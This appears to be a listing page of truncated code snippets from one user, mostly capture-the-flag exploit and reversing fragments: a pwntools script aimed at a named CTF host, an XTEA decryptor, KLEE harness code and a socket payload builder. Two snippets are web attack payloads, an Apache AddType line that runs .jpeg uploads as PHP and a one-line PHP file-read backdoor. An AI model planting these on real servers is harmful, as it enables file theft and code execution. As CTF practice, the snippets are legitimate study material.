volpino

<?php
foobar
 ?>

volpino

AddType application/x-httpd-php .jpeg

volpino

<?php echo readfile($_GET["c"]); ?>

volpino

from pwn import *

#r = remote('127.0.0.1', 1337)
atoi_system_offset = 58640
r = remote('pwn.rhme.riscure.com', 1337)

# Create player 0
r.recvuntil("Your choice:")
r.send("1\n")
r.send("A" * 0 + "\n")

volpino

from pwn import *

"""
c6c2XX mov dl, XX

1100011011000010

1100011011000000XXXXXXXX
1100011011000111XXXXXXXX

volpino

import requests
import string
import random
import urllib


def xor(s1, s2):
    assert len(s1) == 16 and len(s2) == 16
    return "".join([chr(ord(s1[i]) ^ ord(s2[i])) for i in range(16)])

volpino

Finding entry points
Branch analysis from position: 0
Jump found. Position 1 = -2
filename:       /tmp/solve.php
function name:  (null)
number of ops:  7
compiled vars:  none
line     #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   2     0  E >   SEND_VAL                                                 'cache.data'

volpino

#include<stdio.h>
#include<stdlib.h>
#include<klee/klee.h>
#include "defs.h"


int main(int argc, const char **argv, const char **envp);
void  path_fail();
void  count_fail();
void  path_key();

volpino

import struct
import xtea

ciphertext = open("./ciphertext.bin").read()

def dec(word):
    return struct.unpack("<I", word)[0]

def chunks(l, n):
    for i in xrange(0, len(l), n):

volpino

from socket import socket
import struct

def q(word):
    return struct.pack("<I", word)

message = "\x00\x00\x06\x00AAAA"
message += "\x00\x01\x07\x00AAAA"
message += "\x0c\x00\x00\x00AAAA"